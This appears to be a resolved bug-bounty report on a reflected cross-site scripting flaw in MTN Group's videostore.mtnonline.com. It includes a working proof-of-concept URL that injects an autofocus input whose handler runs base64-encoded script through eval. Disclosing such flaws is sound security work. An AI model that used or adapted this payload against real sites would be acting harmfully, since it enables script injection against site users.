XSS at videostore.mtnonline.com/GL/*.aspx via all parameters
Medium
M
MTN Group
Submitted None
Actions:
Reported by
homosec
Vulnerability Details
Technical details and impact analysis
PoC
```
https://videostore.mtnonline.com/GL/MyAccount.aspx?PId=126&CID=5&OprId=11%27><input%20onfocus=eval(atob(%27YWxlcnQoJ1hTUycp%27))%20autofocus>
```
Symbols <"/'> are not filtered that alloweds to inject HTML code.
{F1353609}
## Impact
XSS at videostore.mtnonline.com
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Submitted
Weakness
Cross-site Scripting (XSS) - Reflected